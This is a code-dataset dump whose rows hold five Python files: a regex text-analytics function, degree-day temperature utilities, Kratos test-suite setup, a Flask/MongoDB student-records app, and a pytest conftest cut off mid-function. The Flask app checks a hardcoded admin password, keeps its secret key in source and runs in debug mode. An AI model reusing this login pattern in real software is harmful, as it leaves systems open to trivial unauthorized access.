hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
863f656903c4148e82b3b4fd5343ee724e111ab6
| 3,469
|
py
|
Python
|
function/python/brightics/function/textanalytics/regex.py
|
jhpark428/studio
|
539457b3026dda827c1b17b4cb851946e34e3b85
|
[
"Apache-2.0"
] | 202
|
2018-10-23T04:37:35.000Z
|
2022-01-27T05:51:10.000Z
|
function/python/brightics/function/textanalytics/regex.py
|
sagarmk/studio
|
3bc547fdf85ae6be80c1b40916f9f5d31d2b3f75
|
[
"MIT"
] | 444
|
2018-11-07T08:41:14.000Z
|
2022-03-16T06:48:57.000Z
|
function/python/brightics/function/textanalytics/regex.py
|
sagarmk/studio
|
3bc547fdf85ae6be80c1b40916f9f5d31d2b3f75
|
[
"MIT"
] | 99
|
2018-11-08T04:12:13.000Z
|
2022-03-30T05:36:27.000Z
|
"""
Copyright 2019 Samsung SDS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from brightics.common.utils import check_required_parameters
from brightics.common.exception import BrighticsFunctionException
from .data import regex_format_dict
import re
def regex(table, **params):
check_required_parameters(_regex, params, ['table'])
return _regex(table, **params)
def _regex(table, input_cols, transformation_mode='extract', find_mode='all', pattern='',
user_dict_pattern='', custom_pattern='', replacement_string='', user_dict=None):
out_table = table.copy()
pattern_dict = regex_format_dict.pattern_dict
user_pattern_dict = {}
if user_dict is not None:
user_patterns = user_dict.values
for user_pattern in user_patterns:
user_pattern_name = user_pattern[0]
user_pattern_content = user_pattern[1]
user_pattern_dict[user_pattern_name] = user_pattern_dict.get(user_pattern_name, []) + [user_pattern_content]
user_pattern_dict = {key: r'|'.join(value) for key, value in user_pattern_dict.items()}
if pattern == '':
raise BrighticsFunctionException.from_errors([{'0100': "Please choose a pattern."}])
if pattern == 'custom':
raw_pattern = custom_pattern
elif pattern == 'user_dictionary':
raw_pattern = user_pattern_dict.get(user_dict_pattern)
if raw_pattern is None:
raise BrighticsFunctionException.from_errors(
[{'0100': user_dict_pattern + " is not a valid pattern name in the user dictionary."}])
else:
raw_pattern = pattern_dict.get(pattern)
regex_pattern = re.compile(raw_pattern)
def transformation(text):
if transformation_mode == 'extract':
if find_mode == 'first':
result = regex_pattern.search(text)
if result is None:
return ""
else:
return result.group()
else: # find_mode == 'all'
return regex_pattern.findall(text)
elif transformation_mode == 'replace':
if find_mode == 'first':
return regex_pattern.sub(replacement_string, text, 1)
else: # find_mode == 'all'
return regex_pattern.sub(replacement_string, text)
elif transformation_mode == 'remove':
if find_mode == 'first':
return regex_pattern.sub("", text, 1)
else: # find_mode == 'all'
return regex_pattern.sub("", text)
else: # transformation_mode == 'split'
if find_mode == 'first':
return regex_pattern.split(text, 1)
else: # find_mode == 'all'
return regex_pattern.split(text)
for col in input_cols:
result_col = table[col].apply(transformation)
out_table['regex_' + col] = result_col
return {'out_table': out_table}
| 40.811765
| 120
| 0.643701
| 418
| 3,469
| 5.114833
| 0.311005
| 0.07203
| 0.058934
| 0.028064
| 0.260992
| 0.138447
| 0.138447
| 0.089804
| 0.056127
| 0.038354
| 0
| 0.008242
| 0.265494
| 3,469
| 84
| 121
| 41.297619
| 0.830848
| 0.189968
| 0
| 0.183333
| 0
| 0
| 0.064093
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.066667
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
863fffaabccfedecd9149dc35acae6b9542aa04c
| 8,500
|
py
|
Python
|
bin/temperature_functions.py
|
travc/outbreak-reporter
|
0f03ca66993827ae1866d09e3cf5d9f6d4acb633
|
[
"MIT"
] | null | null | null |
bin/temperature_functions.py
|
travc/outbreak-reporter
|
0f03ca66993827ae1866d09e3cf5d9f6d4acb633
|
[
"MIT"
] | 2
|
2019-12-15T19:58:26.000Z
|
2019-12-17T05:33:32.000Z
|
bin/temperature_functions.py
|
travc/outbreak-reporter
|
0f03ca66993827ae1866d09e3cf5d9f6d4acb633
|
[
"MIT"
] | 1
|
2022-03-04T01:36:38.000Z
|
2022-03-04T01:36:38.000Z
|
#!/usr/bin/env python3
import sys
import os
import logging
import numpy as np
import pandas as pd
import dateutil
def tempF2C(x): return (x-32.0)*5.0/9.0
def tempC2F(x): return (x*9.0/5.0)+32.0
def load_temperature_hdf5(temps_fn, local_time_offset, basedir=None, start_year=None, truncate_to_full_day=False):
## Load temperature
# temps_fn = "{}_AT_cleaned.h5".format(station_callsign)
logging.info("Using saved temperatures file '{}'".format(temps_fn))
if basedir is not None:
temps_fn = os.path.join(basedir, temps_fn)
tempdf = pd.read_hdf(temps_fn, 'table')
tmp = local_time_offset.split(':')
tmp = int(tmp[0])*3600+int(tmp[1])*60
sitetz = dateutil.tz.tzoffset(local_time_offset, tmp)
tempdf.index = tempdf.index.tz_convert(sitetz)
if truncate_to_full_day:
x = tempdf.index[-1]
if x.hour != 23:
x = x-pd.Timedelta(days=1)
tmp = '{:04d}-{:02d}-{:02d}'.format(x.year, x.month, x.day)
tempdf = tempdf.loc[:tmp]
if start_year is not None:
tempdf = tempdf.loc['{}-01-01'.format(start_year):]
logging.info("Temperature data date range used: {} through {}".format(tempdf.index[0], tempdf.index[-1]))
return tempdf
def load_temperature_csv(fn, local_time_offset=None):
t = pd.read_csv(fn, index_col=0)
if local_time_offset is not None:
tmp = local_time_offset.split(':')
tmp = int(tmp[0])*3600+int(tmp[1])*60
sitetz = dateutil.tz.tzoffset(local_time_offset, tmp)
#t.index = pd.to_datetime(t.index).tz_localize('UTC').tz_convert(sitetz) # @TCC this fails if csv contains datetimes with TZ
t.index = pd.to_datetime(t.index)
try:
t.index = t.index.tz_localize('UTC')
except TypeError:
pass
t.index = t.index.tz_convert(sitetz)
return t
# Function which computes BM (single sine method) degree day generation from temperature data
def compute_BMDD_Fs(tmin, tmax, base_temp, dd_gen):
# Used internally
def _compute_daily_BM_DD(mint, maxt, avet, base_temp):
"""Use standard Baskerville-Ermin (single sine) degree-day method
to compute the degree-day values for each a single day.
"""
if avet is None:
avet = (mint+maxt)/2.0 # simple midpoint (like in the refs)
dd = np.nan # value which we're computing
# Step 1: Adjust for observation time; not relevant
# Step 2: GDD = 0 if max < base (curve all below base)
if maxt < base_temp:
dd = 0
# Step 3: Calc mean temp for day; already done previously
# Step 4: min > base; then whole curve counts
elif mint >= base_temp:
dd = avet - base_temp
# Step 5: else use curve minus part below base
else:
W = (maxt-mint)/2.0
tmp = (base_temp-avet) / W
if tmp < -1:
print('WARNING: (base_temp-avet)/W = {} : should be [-1:1]'.format(tmp))
tmp = -1
if tmp > 1:
print('WARNING: (base_temp-avet)/W = {} : should be [-1:1]'.format(tmp))
tmp = 1
A = np.arcsin(tmp)
dd = ((W*np.cos(A))-((base_temp-avet)*((np.pi/2.0)-A)))/np.pi
return dd
# compute the degree-days for each day in the temperature input (from tmin and tmax vectors)
dd = pd.concat([tmin,tmax], axis=1)
dd.columns = ['tmin', 'tmax']
dd['DD'] = dd.apply(lambda x: _compute_daily_BM_DD(x[0], x[1], (x[0]+x[1])/2.0, base_temp), axis=1)
# compute the degree-days for each day in the temperature input (from a daily groupby)
# grp = t.groupby(pd.TimeGrouper('D'))
# dd = grp.agg(lambda x: _compute_daily_BM_DD(np.min(x), np.max(x), None, base_temp))
# dd.columns = ['DD']
# Find the point where cumulative sums of degree days cross the threshold
cDD = dd['DD'].cumsum(skipna=True)
for cumdd_threshold,label in [[1*dd_gen,'F1'], [2*dd_gen,'F2'], [3*dd_gen,'F3']]:
dtmp = np.zeros(len(dd['DD']))*np.nan
tmp = np.searchsorted(cDD, cDD+(cumdd_threshold)-dd['DD'], side='left').astype(float)
tmp[tmp>=len(tmp)] = np.nan
#dd[label+'_idx'] = tmp
# convert those indexes into end times
e = pd.Series(index=dd.index, dtype='float64')#, dtype='datetime64[ns]')
#e[~np.isnan(tmp)] = dd.index[tmp[~np.isnan(tmp)].astype(int)] # @TCC previous code
e.loc[~np.isnan(tmp)] = dd.index[tmp[~np.isnan(tmp)].astype(int)]
e.loc[np.isnan(tmp)] = np.nan
dd[label+'_end'] = e
# and duration...
#dd[label] = (e-dd.index+pd.Timedelta(days=1)).apply(lambda x: np.nan if pd.isnull(x) else x.days) # @TCC previous code
dd[label] = (pd.to_datetime(e)-dd.index+pd.Timedelta(days=1)).apply(lambda x: np.nan if pd.isnull(x) else x.days)
#dd.loc[np.isnan(tmp), label] = np.nan
print("DD dataframe min values\n", dd.min())
return dd
def compute_year_over_year_norm(in_dataframe,
start, end,
norm_start=None, norm_end=None,
freq='daily',
interp_method='linear',
norm_method='mean'):
"""
Parameters
----------
start: convertable to Datetime
start range of dates to output
end: convertable to Datetime
end range of dates to output
norm_start : convertable to Datetime or None
`None` will use in_dataframe.index[0]
norm_end : convertable to Datetime or None
if given (not None), output range does not include `norm_end` (it is half-open)
`None` will use in_dataframe.index[-1]
freq : {'daily', 'hourly'}
interp_method : str or None
`None` will skip resample and interpolation, so
`in_dataframe` must already be daily or hourly (depending on `freq`)!
norm_method : {'mean', 'median'}
"""
if freq == 'hourly':
hrs = 24
hrs_freq = '1h'
elif freq == 'daily':
hrs = 1
hrs_freq = '24h'
else:
raise ValueError("Invalid `freq` argument value: {}".format(freq))
if norm_start is None:
norm_start = in_dataframe.index[0]
if norm_end is None:
norm_end = in_dataframe.index[-1]
else:
norm_end = pd.to_datetime([norm_end])[0] - pd.Timedelta('1 second')
print('Computing using range:', norm_start, 'to', norm_end)
if interp_method is None: # skip resample+interpolation (assumes in_dataframe is daily!)
t = in_dataframe.loc[norm_start:norm_end]
else: # resample and interpolate to get hourly
t = in_dataframe.resample(hrs_freq).interpolate(method=interp_method).loc[norm_start:norm_end]
if norm_method == 'mean':
norm = t.groupby([t.index.month, t.index.day, t.index.hour]).mean().sort_index()
elif norm_method == 'median':
norm = t.groupby([t.index.month, t.index.day, t.index.hour]).median().sort_index()
else:
assert False, "Error: Unknown norm_method '{}'".format(norm_method)
# now replicate and trim to the desired output range
start = pd.to_datetime(start)
end = pd.to_datetime(end)
# need a non-leapyear and leapyear version
norm_ly = norm.copy()
if norm.shape[0] == 366*hrs:
norm = norm.drop((2,29,))
else: # norm doesn't include any leapyear data
assert norm.shape[0] == 365*hrs
# make Feb 29 the mean of Feb 28 and Mar 1
foo = (norm.loc[(2,28,)] + norm.loc[(3,1,)]) / 2.0
foo.index = pd.MultiIndex.from_product( ([2],[29],list(range(hrs))) )
norm_ly = pd.concat((norm_ly,foo)).sort_index()
norm_ly.sort_index(inplace=True) # probably not needed
# build up a 'long normal' (lnorm) dataframe year by year by appending the norm or norm_ly
lnorm = None
for yr in np.arange(start.year, end.year+1):
#print(yr)
idx = pd.date_range(start='{}-{:02d}-{:02d} {:02d}:00:00'.format(yr,*norm.index[0]),
end= '{}-{:02d}-{:02d} {:02d}:00:00'.format(yr,*norm.index[-1]),
freq=hrs_freq)
if idx.shape[0] == 366*hrs:
foo = norm_ly.copy()
else:
assert norm.shape[0] == 365*hrs
foo = norm.copy()
foo.index = idx
if lnorm is None:
lnorm = foo
else:
lnorm = lnorm.append(foo)
return lnorm.loc[start:end]
| 41.062802
| 132
| 0.598
| 1,259
| 8,500
| 3.926926
| 0.250993
| 0.01699
| 0.021238
| 0.009709
| 0.234426
| 0.188107
| 0.158981
| 0.149272
| 0.149272
| 0.137136
| 0
| 0.025862
| 0.263059
| 8,500
| 206
| 133
| 41.262136
| 0.76341
| 0.294118
| 0
| 0.149254
| 0
| 0
| 0.081514
| 0
| 0
| 0
| 0
| 0
| 0.022388
| 1
| 0.052239
| false
| 0.007463
| 0.044776
| 0.014925
| 0.134328
| 0.029851
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
864003328f8b49eae739c102dea7da6313ecab13
| 2,584
|
py
|
Python
|
applications/CSharpWrapperApplication/tests/test_CSharpWrapperApplication.py
|
lkusch/Kratos
|
e8072d8e24ab6f312765185b19d439f01ab7b27b
|
[
"BSD-4-Clause"
] | 778
|
2017-01-27T16:29:17.000Z
|
2022-03-30T03:01:51.000Z
|
applications/CSharpWrapperApplication/tests/test_CSharpWrapperApplication.py
|
lkusch/Kratos
|
e8072d8e24ab6f312765185b19d439f01ab7b27b
|
[
"BSD-4-Clause"
] | 6,634
|
2017-01-15T22:56:13.000Z
|
2022-03-31T15:03:36.000Z
|
applications/CSharpWrapperApplication/tests/test_CSharpWrapperApplication.py
|
lkusch/Kratos
|
e8072d8e24ab6f312765185b19d439f01ab7b27b
|
[
"BSD-4-Clause"
] | 224
|
2017-02-07T14:12:49.000Z
|
2022-03-06T23:09:34.000Z
|
# import Kratos
import KratosMultiphysics
import KratosMultiphysics.StructuralMechanicsApplication as StructuralMechanicsApplication
import KratosMultiphysics.CSharpWrapperApplication as CSharpWrapperApplication
import run_cpp_unit_tests
# Import Kratos "wrapper" for unittests
import KratosMultiphysics.KratosUnittest as KratosUnittest
# Import subprocess
import subprocess
# Using kratos_utilities
import KratosMultiphysics.kratos_utilities as kratos_utilities
if kratos_utilities.CheckIfApplicationsAvailable("ExternalSolversApplication"):
has_external_solvers_application = True
else:
has_external_solvers_application = False
# Import the tests o test_classes to create the suits
## SMALL TESTS
## NIGTHLY TESTS
## VALIDATION TESTS
def AssembleTestSuites():
''' Populates the test suites to run.
Populates the test suites to run. At least, it should pupulate the suites:
"small", "nighlty" and "all"
Return
------
suites: A dictionary of suites
The set of suites with its test_cases added.
'''
suites = KratosUnittest.KratosSuites
# Create a test suit with the selected tests (Small tests):
smallSuite = suites['small']
# Create a test suit with the selected tests plus all small tests
nightlySuite = suites['nightly']
### BEGIN SMALL SUITE ###
### END SMALL SUITE ###
### BEGIN NIGHTLY SUITE ###
### END VALIDATION SUITE ###
### BEGIN VALIDATION SUITE ###
# For very long tests that should not be in nighly and you can use to validate
validationSuite = suites['validation']
validationSuite.addTests(nightlySuite)
### END VALIDATION ###
# Create a test suit that contains all the tests:
allSuite = suites['all']
allSuite.addTests(nightlySuite) # Already contains the smallSuite
validationSuite.addTests(allSuite) # Validation contains all
# Manual list for debugging
#allSuite.addTests(
#KratosUnittest.TestLoader().loadTestsFromTestCases([
#### STANDALONE
#### SMALL
#### NIGTHLY
#### VALIDATION
#])
#)
return suites
if __name__ == '__main__':
KratosMultiphysics.Logger.PrintInfo("Unittests", "\nRunning cpp unit tests ...")
run_cpp_unit_tests.run()
KratosMultiphysics.Logger.PrintInfo("Unittests", "Finished running cpp unit tests!")
KratosMultiphysics.Logger.PrintInfo("Unittests", "\nRunning python tests ...")
KratosUnittest.runTests(AssembleTestSuites())
KratosMultiphysics.Logger.PrintInfo("Unittests", "Finished python tests!")
| 29.363636
| 90
| 0.71904
| 267
| 2,584
| 6.861423
| 0.370787
| 0.065502
| 0.026201
| 0.091703
| 0.176856
| 0.067686
| 0.03821
| 0.03821
| 0
| 0
| 0
| 0
| 0.195046
| 2,584
| 87
| 91
| 29.701149
| 0.880769
| 0.379257
| 0
| 0
| 0
| 0
| 0.135786
| 0.017391
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.25
| 0
| 0.321429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86421594cd7a65136f722a4e9889059ae90e1d77
| 2,145
|
py
|
Python
|
run.py
|
Ganeshrockz/Flask-Python-Dev
|
522b280484e8f4cf3877b378a1334c501ffbc41e
|
[
"Apache-2.0"
] | null | null | null |
run.py
|
Ganeshrockz/Flask-Python-Dev
|
522b280484e8f4cf3877b378a1334c501ffbc41e
|
[
"Apache-2.0"
] | null | null | null |
run.py
|
Ganeshrockz/Flask-Python-Dev
|
522b280484e8f4cf3877b378a1334c501ffbc41e
|
[
"Apache-2.0"
] | null | null | null |
from flask import Flask, flash, render_template, redirect, url_for
from flask.ext.pymongo import PyMongo
from flask import request
app=Flask(__name__)
app.config['MONGO_DBNAME']='stud'
app.config['MONGO_URI']='mongodb://localhost:27017/stud'
mongo=PyMongo(app)
"""
@app.route('/add')
def add():
user=mongo.db.users
user.insert({"name":"Ganesh","age":19})
return "Added"
@app.route('/find')
def find():
user=mongo.db.users
data=user.find_one({"name":"Ganesh"})
return data["name"]
"""
@app.route('/',methods=['GET', 'POST'])
def dashboard():
if request.method == 'POST':
name=request.form['name']
passw=request.form['password']
if name=="admin123" and passw=="12345":
return redirect(url_for('display'))
else:
return render_template("dashboard.html",err="Login Failed")
else:
return render_template("dashboard.html")
@app.route('/form',methods=['GET', 'POST'])
def form():
if request.method == 'POST':
user=mongo.db.student
rollno=request.form['rollno']
name=request.form['name']
address=request.form['address']
year=request.form['year']
skills=request.form['skills']
phone=request.form['phone']
email=request.form['emailid']
user.insert({"Rollnumber":rollno,"StudentName":name,"Address":address,"Year":year,"Skills":skills,"PhoneNumber":phone,"EmailId":email})
return redirect(url_for('dashboard'))
else:
return render_template("form.html")
@app.route('/display',methods=['GET', 'POST'])
def display():
data=mongo.db.student
record=[]
for rec in data.find():
record.append({"Rollnumber":rec["Rollnumber"],"StudentName":rec["StudentName"],"Address":rec["Address"],"Year":rec["Year"],"Skills":rec["Skills"],"PhoneNumber":rec["PhoneNumber"],"EmailId":rec["EmailId"]})
app.logger.info(record)
return render_template("display.html", studentdata=record)
if __name__ == '__main__':
app.secret_key = 'ganeshrockz'
app.run(debug=True)
| 35.75
| 213
| 0.620513
| 253
| 2,145
| 5.166008
| 0.316206
| 0.075746
| 0.061209
| 0.039021
| 0.056618
| 0.056618
| 0
| 0
| 0
| 0
| 0
| 0.008711
| 0.197203
| 2,145
| 59
| 214
| 36.355932
| 0.75029
| 0
| 0
| 0.159091
| 0
| 0
| 0.224921
| 0.015839
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068182
| false
| 0.045455
| 0.068182
| 0
| 0.272727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86448f12322f6a8ff13f239dbc2163cdebce1c56
| 12,198
|
py
|
Python
|
resources/tests/conftest.py
|
jussiarpalahti/respa
|
c308bcb96e56d9401e22df94d3073e248618e243
|
[
"MIT"
] | null | null | null |
resources/tests/conftest.py
|
jussiarpalahti/respa
|
c308bcb96e56d9401e22df94d3073e248618e243
|
[
"MIT"
] | null | null | null |
resources/tests/conftest.py
|
jussiarpalahti/respa
|
c308bcb96e56d9401e22df94d3073e248618e243
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import pytest
import datetime
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group
from rest_framework.test import APIClient, APIRequestFactory
from resources.enums import UnitAuthorizationLevel
from resources.models import Resource, ResourceType, Unit, Purpose, Day, Period
from resources.models import Equipment, EquipmentAlias, ResourceEquipment, EquipmentCategory, TermsOfUse, ResourceGroup
from resources.models import AccessibilityValue, AccessibilityViewpoint, ResourceAccessibility, UnitAccessibility
from munigeo.models import Municipality
@pytest.fixture
def api_client():
return APIClient()
@pytest.fixture
def staff_api_client(staff_user):
api_client = APIClient()
api_client.force_authenticate(user=staff_user)
return api_client
@pytest.fixture
def user_api_client(user):
api_client = APIClient()
api_client.force_authenticate(user=user)
return api_client
@pytest.fixture(params=[None, 'user', 'staff_user'])
def all_user_types_api_client(request):
api_client = APIClient()
if request.param:
api_client.force_authenticate(request.getfixturevalue(request.param))
return api_client
@pytest.fixture
def api_rf():
return APIRequestFactory()
@pytest.mark.django_db
@pytest.fixture
def space_resource_type():
return ResourceType.objects.get_or_create(id="test_space", name="test_space", main_type="space")[0]
@pytest.mark.django_db
@pytest.fixture
def space_resource(space_resource_type):
return Resource.objects.create(type=space_resource_type, authentication="none", name="resource")
@pytest.mark.django_db
@pytest.fixture
def test_unit():
return Unit.objects.create(name="unit", time_zone='Europe/Helsinki')
@pytest.fixture
def test_unit2():
return Unit.objects.create(name="unit 2", time_zone='Europe/Helsinki')
@pytest.fixture
def test_unit3():
return Unit.objects.create(name="unit 3", time_zone='Europe/Helsinki')
@pytest.fixture
def terms_of_use():
return TermsOfUse.objects.create(
name_fi='testikäyttöehdot',
name_en='test terms of use',
text_fi='kaikki on kielletty',
text_en='everything is forbidden',
)
@pytest.mark.django_db
@pytest.fixture
def resource_in_unit(space_resource_type, test_unit, terms_of_use):
return Resource.objects.create(
type=space_resource_type,
authentication="none",
name="resource in unit",
unit=test_unit,
max_reservations_per_user=1,
max_period=datetime.timedelta(hours=2),
reservable=True,
generic_terms=terms_of_use,
specific_terms_fi='spesifiset käyttöehdot',
specific_terms_en='specific terms of use',
reservation_confirmed_notification_extra_en='this resource rocks'
)
@pytest.mark.django_db
@pytest.fixture
def resource_in_unit2(space_resource_type, test_unit2):
return Resource.objects.create(
type=space_resource_type,
authentication="none",
name="resource in unit 2",
unit=test_unit2,
max_reservations_per_user=2,
max_period=datetime.timedelta(hours=4),
reservable=True,
)
@pytest.mark.django_db
@pytest.fixture
def resource_in_unit3(space_resource_type, test_unit3):
return Resource.objects.create(
type=space_resource_type,
authentication="none",
name="resource in unit 3",
unit=test_unit3,
max_reservations_per_user=2,
max_period=datetime.timedelta(hours=4),
reservable=True,
)
@pytest.mark.django_db
@pytest.fixture
def resource_with_opening_hours(resource_in_unit):
p1 = Period.objects.create(start=datetime.date(2115, 1, 1),
end=datetime.date(2115, 12, 31),
resource=resource_in_unit, name='regular hours')
for weekday in range(0, 7):
Day.objects.create(period=p1, weekday=weekday,
opens=datetime.time(8, 0),
closes=datetime.time(18, 0))
resource_in_unit.update_opening_hours()
return resource_in_unit
@pytest.mark.django_db
@pytest.fixture
def exceptional_period(resource_with_opening_hours):
parent = resource_with_opening_hours.periods.first()
period = Period.objects.create(start='2115-01-10', end='2115-01-12',
resource=resource_with_opening_hours,
name='exceptional hours',
exceptional=True, parent=parent)
date = period.start
Day.objects.create(period=period, weekday=date.weekday(),
closed=True)
date = date + datetime.timedelta(days=1)
Day.objects.create(period=period, weekday=date.weekday(),
opens='12:00', closes='13:00')
date = date + datetime.timedelta(days=1)
Day.objects.create(period=period, weekday=date.weekday(),
closed=True)
return period
@pytest.mark.django_db
@pytest.fixture
def equipment_category():
return EquipmentCategory.objects.create(
name='test equipment category'
)
@pytest.mark.django_db
@pytest.fixture
def equipment(equipment_category):
equipment = Equipment.objects.create(name='test equipment', category=equipment_category)
return equipment
@pytest.mark.django_db
@pytest.fixture
def equipment_alias(equipment):
equipment_alias = EquipmentAlias.objects.create(name='test equipment alias', language='fi', equipment=equipment)
return equipment_alias
@pytest.mark.django_db
@pytest.fixture
def resource_equipment(resource_in_unit, equipment):
data = {'test_key': 'test_value'}
resource_equipment = ResourceEquipment.objects.create(
equipment=equipment,
resource=resource_in_unit,
data=data,
description='test resource equipment',
)
return resource_equipment
@pytest.mark.django_db
@pytest.fixture
def user():
return get_user_model().objects.create(
username='test_user',
first_name='Cem',
last_name='Kaner',
email='cem@kaner.com',
preferred_language='en'
)
@pytest.mark.django_db
@pytest.fixture
def user2():
return get_user_model().objects.create(
username='test_user2',
first_name='Brendan',
last_name='Neutra',
email='brendan@neutra.com'
)
@pytest.mark.django_db
@pytest.fixture
def staff_user():
return get_user_model().objects.create(
username='test_staff_user',
first_name='John',
last_name='Staff',
email='john@staff.com',
is_staff=True,
preferred_language='en'
)
@pytest.mark.django_db
@pytest.fixture
def unit_manager_user(resource_in_unit):
user = get_user_model().objects.create(
username='test_manager_user',
first_name='Inspector',
last_name='Lestrade',
